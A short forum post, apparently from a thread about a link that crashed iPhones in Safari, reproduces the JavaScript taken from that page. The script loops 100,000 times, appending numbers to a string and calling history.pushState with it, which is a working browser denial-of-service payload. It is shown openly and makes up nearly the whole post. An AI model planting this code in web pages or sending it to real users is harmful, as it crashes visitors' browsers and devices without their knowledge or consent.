Crash iPhone from Safari (Warning: Direct Link) 11 years ago
If anyone is interested, this is the javascript pulled from the webpage.
var total = "";
for (var i = 0; i < 100000; i++) {
total = total + i.toString();
history.pushState(0, 0, total);
}
edit: formatting